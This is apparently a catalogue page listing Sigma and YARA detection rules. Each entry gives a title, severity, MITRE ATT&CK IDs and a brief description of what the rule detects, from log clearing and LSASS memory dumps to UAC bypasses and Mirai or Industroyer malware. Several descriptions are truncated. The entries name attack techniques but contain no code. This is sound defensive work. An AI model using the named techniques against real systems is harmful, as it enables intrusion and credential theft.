Clear Linux Logs
sigma medium
T1070.002
imProcessCreate
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Clipboard Collection with Xclip Tool
sigma low
T1115
imProcessCreate
Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard ut
Curl Usage on Linux
sigma low
T1105
imProcessCreate
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Disable Or Stop Services
sigma medium
imProcessCreate
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
File Deletion
sigma low
T1070.004
imProcessCreate
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
History File Deletion
sigma high
T1565.001
imProcessCreate
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Linux Base64 Encoded Shebang In CLI
sigma medium
T1140
imProcessCreate
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Print History File Contents
sigma medium
T1592.004
imProcessCreate
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Remove Immutable File Attribute
sigma medium
T1222.002
imProcessCreate
Detects usage of the 'chattr' utility to remove immutable file attribute.
Remove Scheduled Cron Task/Job
sigma medium
imProcessCreate
Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack th
Suspicious Curl Change User Agents - Linux
sigma medium
T1071.001
imProcessCreate
Detects a suspicious curl process start on linux with set useragent options
System Network Discovery - Linux
sigma low
T1016
imProcessCreate
Detects enumeration of local network configuration
Taskkill Symantec Endpoint Protection
sigma high
T1685
imProcessCreate
Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a r
Delete All Scheduled Tasks
sigma high
T1489
imProcessCreate
Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
Email Exifiltration Via Powershell
sigma high
imProcessCreate
Detects email exfiltration via powershell cmdlets
Suspicious Reg Add BitLocker
sigma high
T1486
imProcessCreate
Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
User Added to Remote Desktop Users Group
sigma high
T1133T1136.001T1021.001
imProcessCreate
Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
Suspicious Process Parents
sigma high
T1036
imProcessCreate
Detects suspicious parent processes that should not have any children or should only have a single possible child program
Dism Remove Online Package
sigma medium
T1685
imProcessCreate
Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Suspicious SysAidServer Child
sigma medium
T1210
imProcessCreate
Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
Bitsadmin to Uncommon IP Server Address
sigma high
T1071.001T1197
imWebSession
Detects Bitsadmin connections to IP addresses instead of FQDN names
Persistence Via TypedPaths - CommandLine
sigma medium
imProcessCreate
Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
Legitimate Application Dropped Archive
sigma high
T1218
imFileEvent
Detects programs on a Windows system that should not write an archive to disk
Execute Code with Pester.bat as Parent
sigma medium
T1059.001T1216
imProcessCreate
Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
DeviceCredentialDeployment Execution
sigma medium
T1218
imProcessCreate
Detects the execution of DeviceCredentialDeployment to hide a process from view.
Launch-VsDevShell.PS1 Proxy Execution
sigma medium
T1216.001
imProcessCreate
Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
REGISTER_APP.VBS Proxy Execution
sigma medium
T1218
imProcessCreate
Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
Third Party Software DLL Sideloading
sigma medium
T1574.001
DeviceImageLoadEvents
Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
T1105
imProcessCreate
Download and compress a remote file and store it in a cab file on local machine.
Suspicious GUP Usage
sigma high
T1574.001
imProcessCreate
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
Suspicious Interactive PowerShell as SYSTEM
sigma high
T1059.001
imFileEvent
Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
Writing Local Admin Share
sigma medium
T1546.002
imFileEvent
Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
T1574.001
imFileEvent
Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is
Flash Player Update from Suspicious Location
sigma high
T1189T1204.002T1036.005
imWebSession
Detects a flashplayer update from an unofficial location
Suspicious Debugger Registration Cmdline
sigma high
T1546.008
imProcessCreate
Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Tamper Windows Defender Remove-MpPreference
sigma high
T1685
imProcessCreate
Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
DLL Sideloading by VMware Xfer Utility
sigma high
T1574.001
imProcessCreate
Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
Suspicious Download from Office Domain
sigma high
T1105T1608
imProcessCreate
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
T1574.001
imFileEvent
Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Sea
ISO File Created Within Temp Folders
sigma high
T1566.001
imFileEvent
Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.
Drop Binaries Into Spool Drivers Color Folder
sigma medium
imFileEvent
Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
Suspicious Schtasks Execution AppData Folder
sigma high
T1053.005T1059.001
imProcessCreate
Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local
Linux Shell Pipe to Shell
sigma medium
T1140
imProcessCreate
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
UAC Bypass Using Iscsicpl - ImageLoad
sigma high
T1548.002
DeviceImageLoadEvents
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
UEFI Persistence Via Wpbbin - FileCreation
sigma high
T1542.001
imFileEvent
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
T1542.001
imProcessCreate
Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
Start of NT Virtual DOS Machine
sigma medium
imProcessCreate
Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
T1059.001
imProcessCreate
This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
MMC Spawning Windows Shell
sigma high
T1021.003
imProcessCreate
Detects a Windows command line executable started from MMC
NTDS.DIT Creation By Uncommon Process
sigma high
T1003.002T1003.003
imFileEvent
Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
PowerShell Script Run in AppData
sigma medium
T1059.001
imProcessCreate
Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
RDP to HTTP or HTTPS Target Ports
sigma high
T1572T1021.001
imNetworkSession
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Run PowerShell Script from ADS
sigma high
T1564.004
imProcessCreate
Detects PowerShell script execution from Alternate Data Stream (ADS)
Script Event Consumer Spawning Process
sigma high
T1047
imProcessCreate
Detects a suspicious child process of Script Event Consumer (scrcons.exe).
Suspicious MsiExec Embedding Parent
sigma medium
T1218.007
imProcessCreate
Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads
Suspicious PowerShell Parameter Substring
sigma high
T1059.001
imProcessCreate
Detects suspicious PowerShell invocation with a parameter substring
Suspicious Processes Spawned by WinRM
sigma high
T1190
imProcessCreate
Detects suspicious processes including shells spawnd from WinRM host process
Suspicious Serv-U Process Pattern
sigma high
T1555
imProcessCreate
Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
AD Privileged Users or Groups Reconnaissance
sigma high
T1087.002
imRegistry
Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs
Base64 MZ Header In CommandLine
sigma high
imProcessCreate
Detects encoded base64 MZ header in the commandline
Suspicious Runscripthelper.exe
sigma medium
T1059T1202
imProcessCreate
Detects execution of powershell scripts via Runscripthelper.exe
Abusing Print Executable
sigma medium
T1218
imProcessCreate
Attackers can use print.exe for remote file copy
DD File Overwrite
sigma low
T1485
imProcessCreate
Detects potential overwriting and deletion of a file using DD.
Hack Tool User Agent
sigma high
T1190T1110
imWebSession
Detects suspicious user agent strings user by hack tools in proxy logs
Install Root Certificate
sigma low
T1553.004
imProcessCreate
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Scheduled Task/Job At
sigma low
T1053.002
imProcessCreate
Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execu
Triple Cross eBPF Rootkit Execve Hijack
sigma high
imProcessCreate
Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Triple Cross eBPF Rootkit Install Commands
sigma high
T1014
imProcessCreate
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
UAC Bypass Using IDiagnostic Profile - File
sigma high
T1548.002
imFileEvent
Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
Discovery of a System Time
sigma low
T1124
imProcessCreate
Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
ETW Trace Evasion Activity
sigma high
T1070T1685
imProcessCreate
Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
Uncommon Svchost Parent Process
sigma medium
T1036.005
imProcessCreate
Detects an uncommon svchost parent process
Suspect Svchost Activity
sigma high
T1055
imProcessCreate
It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
WerFault LSASS Process Memory Dump
sigma high
T1003.001
imFileEvent
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
T1218T1216
imProcessCreate
Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Linux Recon Indicators
sigma high
T1592.004T1552.001
imProcessCreate
Detects events with patterns found in commands used for reconnaissance on linux systems
DumpStack.log Defender Evasion
sigma critical
imProcessCreate
Detects the use of the filename DumpStack.log to evade Microsoft Defender
Conhost.exe CommandLine Path Traversal
sigma high
T1059.003
imProcessCreate
detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
Cross Site Scripting Strings
sigma high
T1189
imWebSession
Detects XSS attempts injected via GET requests in access logs
Server Side Template Injection Strings
sigma high
T1221
imWebSession
Detects SSTI attempts sent via GET requests in access logs
Execute Pcwrun.EXE To Leverage Follina
sigma high
T1218
imProcessCreate
Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
Creation of a Diagcab
sigma medium
imFileEvent
Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)
Phishing Pattern ISO in Archive
sigma high
T1566
imProcessCreate
Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain
Nohup Execution
sigma medium
T1059.004
imProcessCreate
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Chmod Suspicious Directory
sigma medium
T1222.002
imProcessCreate
Detects chmod targeting files in abnormal directory paths.
Python Spawning Pretty TTY on Windows
sigma high
T1059
imProcessCreate
Detects python spawning a pretty tty
Suspicious Java Children Processes
sigma high
T1059
imProcessCreate
Detects java process spawning suspicious children
Created Files by Microsoft Sync Center
sigma medium
T1055T1218
imFileEvent
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
Fax Service DLL Search Order Hijack
sigma high
T1574.001
DeviceImageLoadEvents
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Suspicious Desktopimgdownldr Target File
sigma high
T1105
imFileEvent
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Suspicious ScreenSave Change by Reg.exe
sigma medium
T1546.002
imProcessCreate
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Po
Pubprn.vbs Proxy Execution
sigma medium
T1216.001
imProcessCreate
Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
UtilityFunctions.ps1 Proxy Dll
sigma medium
T1216
imProcessCreate
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
Suspicious TSCON Start as SYSTEM
sigma high
T1219.002
imProcessCreate
Detects a tscon.exe start as LOCAL SYSTEM
Taskmgr as LOCAL_SYSTEM
sigma high
T1036
imProcessCreate
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
RunDLL32 Spawning Explorer
sigma high
T1218.011
imProcessCreate
Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
Suspicious GrpConv Execution
sigma high
T1547
imProcessCreate
Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
Powershell Defender Exclusion
sigma medium
T1685
imProcessCreate
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
PrintBrm ZIP Creation of Extraction
sigma high
T1105T1564.004
imProcessCreate
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Gpresult Display Group Policy Information
sigma medium
T1615
imProcessCreate
Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
Suspicious Files in Default GPO Folder
sigma medium
T1036.005
imFileEvent
Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
Suspicious Get-Variable.exe Creation
sigma high
T1546T1027
imFileEvent
Get-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks
DLL Load via LSASS
sigma high
T1547.008
imRegistry
Detects a method to load DLL via LSASS process using an undocumented Registry key
Explorer NOUACCHECK Flag
sigma high
T1548.002
imProcessCreate
Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
Suspicious Dropbox API Usage
sigma high
T1105T1567.002
imNetworkSession
Detects an executable that isn't dropbox but communicates with the Dropbox API
T1204T1566.001
imProcessCreate
The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windo
Node Process Executions
sigma medium
T1127T1059.007
imProcessCreate
Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
Narrator's Feedback-Hub Persistence
sigma high
T1547.001
imRegistry
Detects abusing Windows 10 Narrator's Feedback-Hub
T1560.001
imProcessCreate
Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
Interactive Bash Suspicious Children
sigma medium
T1059.004T1036
imProcessCreate
Detects suspicious interactive bash as a parent to rather uncommon child processes
Suspicious Scan Loop Network
sigma medium
T1059T1018
imProcessCreate
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
T1003.003
imProcessCreate
Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
Suspicious UltraVNC Execution
sigma high
T1021.005
imProcessCreate
Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
Invoke-Obfuscation Via Use MSHTA
sigma high
T1027T1059.001
imProcessCreate
Detects Obfuscated Powershell via use MSHTA in Scripts
Writing Of Malicious Files To The Fonts Folder
sigma medium
T1211T1059
imProcessCreate
Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
T1059.001
imProcessCreate
Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
T1190T1505.003
imFileEvent
Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
GoToAssist Temporary Installation Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
ScreenConnect Temporary Installation Artefact
sigma medium
T1219.002
imFileEvent
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
BPFtrace Unsafe Option Usage
sigma medium
T1059.004
imProcessCreate
Detects the usage of the unsafe bpftrace option
ISO or Image Mount Indicator in Recent Files
sigma medium
T1566.001
imFileEvent
Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users
Network Reconnaissance Activity
sigma high
T1087T1082
imProcessCreate
Detects a set of suspicious network related commands often used in recon stages
Hidden Powershell in Link File Pattern
sigma medium
T1059.001
imProcessCreate
Detects events that appear when a user click on a link file with a powershell command in it
Suspicious Execution of InstallUtil Without Log
sigma medium
imProcessCreate
Uses the .NET InstallUtil.exe application in order to execute image without log
TeamViewer Remote Session
sigma medium
T1219.002
imFileEvent
Detects the creation of log files during a TeamViewer remote session
Installation of TeamViewer Desktop
sigma medium
T1219.002
imFileEvent
TeamViewer_Desktop.exe is create during install
Office Macro File Creation
sigma low
T1566.001
imFileEvent
Detects the creation of a new office macro files on the systems
Linux Doas Tool Execution
sigma low
T1548
imProcessCreate
Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
Shell Open Registry Keys Manipulation
sigma high
T1548.002T1546.001
imRegistry
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 3
T1053
imFileEvent
Detects the creation of tasks from processes executed from suspicious locations
MsiExec Web Install
sigma medium
T1218.007T1105
imProcessCreate
Detects suspicious msiexec process starts with web addresses as parameter
Suspicious Process Start Locations
sigma medium
T1036
imProcessCreate
Detects suspicious process run from unusual locations
Suspicious SYSVOL Domain Group Policy Access
sigma medium
T1552.006
imProcessCreate
Detects Access to Domain Group Policies stored in SYSVOL
Suspicious Execution of Hostname
sigma low
T1082
imProcessCreate
Use of hostname to get information
Suspicious Execution of Shutdown
sigma medium
T1529
imProcessCreate
Use of the commandline to shutdown or reboot windows
Suspicious Query of MachineGUID
sigma low
T1082
imProcessCreate
Use of reg to get MachineGuid information
Creation Exe for Service with Unquoted Path
sigma high
T1547.009
imFileEvent
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in
Suspicious Kernel Dump Using Dtrace
sigma high
T1082
imProcessCreate
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
Suspicious Creation TXT File in User Desktop
sigma high
T1486
imFileEvent
Ransomware create txt file in the user Desktop
Audio Capture via SoundRecorder
sigma medium
T1123
imProcessCreate
Detect attacker collecting audio via SoundRecorder application.
Bypass UAC via Fodhelper.exe
sigma high
T1548.002
imProcessCreate
Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
T1059.003T1059.001T1105
imProcessCreate
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Crypto Miner User Agent
sigma high
T1071.001
imWebSession
Detects suspicious user agent strings used by crypto miners in proxy logs
Decode Base64 Encoded Text
sigma low
T1027
imProcessCreate
Detects usage of base64 utility to decode arbitrary base64-encoded text
T1218
imProcessCreate
The Devtoolslauncher.exe executes other binary
T1685.001T1112
imRegistry
Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.
Disabled IE Security Features
sigma high
T1685
imProcessCreate
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
DLL Execution Via Register-cimprovider.exe
sigma medium
T1574
imProcessCreate
Detects using register-cimprovider.exe to execute arbitrary dll file.
T1048.001T1071.004T1132.001
imProcessCreate
Well-known DNS Exfiltration tools execution
Dumping Process via Sqldumper.exe
sigma medium
T1003.001
imProcessCreate
Detects process dump via legitimate sqldumper.exe binary
Execute Files with Msdeploy.exe
sigma medium
T1218
imProcessCreate
Detects file execution using the msdeploy.exe lolbin
Hijack Legit RDP Session to Move Laterally
sigma high
T1219.002
imFileEvent
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
HTTP Request With Empty User Agent
sigma medium
T1071.001
imWebSession
Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
T1218
imProcessCreate
Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
Interactive AT Job
sigma high
T1053.002
imProcessCreate
Detects an interactive AT job, which may be used as a form of privilege escalation.
Linux Remote System Discovery
sigma low
T1018
imProcessCreate
Detects the enumeration of other remote systems.
MMC20 Lateral Movement
sigma high
T1021.003
imProcessCreate
Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
New DLL Added to AppCertDlls Registry Key
sigma medium
T1546.009
imRegistry
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and r
Octopus Scanner Malware
sigma high
T1195T1195.001
imFileEvent
Detects Octopus Scanner Malware.
OpenWith.exe Executes Specified Binary
sigma high
T1218
imProcessCreate
The OpenWith.exe executes other binary
Path To Screensaver Binary Modified
sigma medium
T1546.002
imRegistry
Detects value modification of registry key containing path to binary used as screensaver.
Processes Accessing the Microphone and Webcam
sigma medium
T1123
imRegistry
Potential adversaries accessing the microphone and webcam in an endpoint.
PwnDrp Access
sigma critical
T1071.001T1102.001T1102.003
imWebSession
Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
T1112
imRegistry
Detects actions caused by the RedMimicry Winnti playbook
Registry Entries For Azorult Malware
sigma critical
T1112
imRegistry
Detects the presence of a registry key created during Azorult execution
T1059
imProcessCreate
Detects PowerShell script execution via input stream redirect
SAM Registry Hive Handle Request
sigma high
T1012T1552.002
imRegistry
Detects handles requested to SAM registry hive
Sdclt Child Processes
sigma medium
T1548.002
imProcessCreate
A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.
Suspicious Desktopimgdownldr Command
sigma high
T1105
imProcessCreate
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
Suspicious HWP Sub Processes
sigma high
T1566.001T1203T1059.003
imProcessCreate
Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
Suspicious RASdial Activity
sigma medium
T1059
imProcessCreate
Detects suspicious process related to rasdial.exe
Suspicious Rundll32 Setupapi.dll Activity
sigma medium
T1218.011
imProcessCreate
setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This t
Suspicious VBoxDrvInst.exe Parameters
sigma medium
T1112
imProcessCreate
Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistenc
SysKey Registry Keys Access
sigma high
T1012
imRegistry
Detects handle requests and access operations to specific registry keys to calculate the SysKey
Sysprep on AppData Folder
sigma medium
T1059
imProcessCreate
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
UAC Bypass Via Wsreset
sigma high
T1548.002
imRegistry
Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
Using SettingSyncHost.exe as LOLBin
sigma high
T1574.008
imProcessCreate
Detects using SettingSyncHost.exe to run hijacked binary
Visual Basic Command Line Compiler Usage
sigma high
T1027.004
imProcessCreate
Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
Wdigest CredGuard Registry Modification
sigma high
T1112
imRegistry
Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is us
Windows Credential Editor Registry
sigma critical
T1003.001
imRegistry
Detects the use of Windows Credential Editor (WCE)
Windows PowerShell User Agent
sigma medium
T1071.001
imWebSession
Detects Windows PowerShell Web Access
Windows WebDAV User Agent
sigma high
T1071.001
imWebSession
Detects WebDav DownloadCradle
WINEKEY Registry Modification
sigma high
T1547
imRegistry
Detects potential malicious modification of run keys by winekey or team9 backdoor
T1546.003
DeviceImageLoadEvents
Detects WMI command line event consumers
T1546.003
imFileEvent
Detects file writes of WMI script event consumer
Linux Crypto Mining Pool Connections
sigma high
T1496
imNetworkSession
Detects process connections to a Monero crypto mining pool
System Information Discovery
sigma low
T1082
imProcessCreate
Detects system information discovery commands
Generic rule for MacGyver.cap
yara low
Generic rule for MacGyver.cap
Generic rule for Hacktool:Win32/EMVSoft who install MacGyver.cap
ShimCache Flush
sigma high
T1112
imProcessCreate
Detects actions that clear the local ShimCache and remove forensic evidence
CMSTP Execution Process Creation
sigma high
T1218.003
imProcessCreate
Detects various indicators of Microsoft Connection Manager Profile Installer execution
CMSTP Execution Registry Event
sigma high
T1218.003
imRegistry
Detects various indicators of Microsoft Connection Manager Profile Installer execution
Python has been used frequently by threat actors for compiling executable file with source code. I found python Stuxnet source code that can be executed with required dependencies. This rule is create
Rule detects the Drovorub-kernel module based on unique strings
This YARA rule detects components of the APT28_drovorub malware
This YARA rule detects network communication
Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)
Email Generic PHP Mailer Script
yara low
YARA rule: Email_Generic_PHP_Mailer_Script
MedussaHTTP v20190812
yara low
MedussaHTTP v20190812
Memory rule for a .net RAT/Agent first found with .pdb referencing almashreq
Generic rule for hostile ACE archive using CVE-2018-20250
Generic rule for Winpot aka ATMPot
yara low
Generic rule for Winpot aka ATMPot
Search strings and procedure in HelloWorld ATM Malware
Detects APT10 MenuPass Uppercut
yara low
Detects APT10 MenuPass Uppercut
Detects APT10 MenuPass Phishing
yara low
Detects APT10 MenuPass Phishing
Detects maldoc With Tartgeting Suspicuios OLE
Detect Word 2007 XML Document in the Flat OPC format w/ embedded Microsoft Office 2007+ document
yara low
Detect Word 2007 XML Document in the Flat OPC format w/ embedded Microsoft Office 2007+ document
Rule for detection of Neuron2 based on the routine used to decrypt the payload
Rule for detection of the .NET payload for Neuron2 based on strings used
The YARA rule 'MW_neuron2_loader_strings' detects Neuron2 malware loaders by identifying
Detects IcedID..adjusted several times
Detects Mirai Satori MALW
yara low
Detects Mirai Satori MALW
Generic detection for MiraiX version 7
Detects Mirai Satori_gen
yara low
Detects Mirai Satori_gen
Detects Mirai Okiru MALW
yara low
Detects Mirai Okiru MALW
Strings of ELF Linux/Httpsd (backdoor, downloader, remote command execution)
Detects ELF Linux/Httpsd i686
yara low
Detects ELF Linux/Httpsd i686
Detects Linux/Httpsd ARMv5
yara low
Detects Linux/Httpsd ARMv5
r4 wiper 1
yara low
YARA rule: r4_wiper_1
r4 wiper 2
yara low
YARA rule: r4_wiper_2
Linux.IotReaper
yara low
Linux.IotReaper
Detects maldoc With exploit for CVE_2017_11882
The 'Contains_DDE_Protocol' rule detects the use of the
Linux.Helios
yara low
Linux.Helios
Emotets
yara low
Emotets
Detects malicious files related to CVE-2017-8759
Detects malicious RTF file related CVE-2017-8759
Detects malicious files related to CVE-2017-8759 - file Doc1.doc
Detects malicious files related to CVE-2017-8759 - file cmd.hta
Detects malicious file in releation with CVE-2017-8759 - file exploit.txt
Detects SOAP WDSL Download via JavaScript
Linux.Bew Backdoor
yara low
Linux.Bew Backdoor
Detects Industroyer related malware
yara low
The YARA rule 'Industroyer_Malware_1' detects Industroyer-related malware,
Detects Industroyer related malware
yara low
Detects Industroyer related malware
Detects Industroyer related malware
yara low
Detects Industroyer related malware
Detects Industroyer related malware
yara low
Detects Industroyer related malware
Detects Industroyer related custom port scaner
This YARA rule detects output files generated by Industroyer's custom port scanner, indicating potential reconnaissance activity. SOC teams should deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify suspicious network scanning behavior.
LuaBot
yara low
LuaBot
This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4.
The FE_LEGALSTRIKE_MACRO rule detects macros using a specific encoding pattern associated with the sample 30f149479c02b74
Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom
yara low
Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom
Gafgyt Trojan
yara low
Gafgyt Trojan
Gafgyt Trojan
yara low
Gafgyt Trojan
Gafgyt Trojan
yara low
Gafgyt Trojan
Gafgyt Trojan
yara low
Gafgyt Trojan
Gafgyt Trojan
yara low
Gafgyt Trojan
Gafgyt Trojan
yara low
Gafgyt Trojan
Hajime Botnet - ARM5
yara low
Hajime Botnet - ARM5
Hajime Botnet - Downloader
yara low
Hajime Botnet - Downloader
Hajime Botnet - generic arch
yara low
Hajime Botnet - generic arch
Hajime Botnet - MIPS
yara low
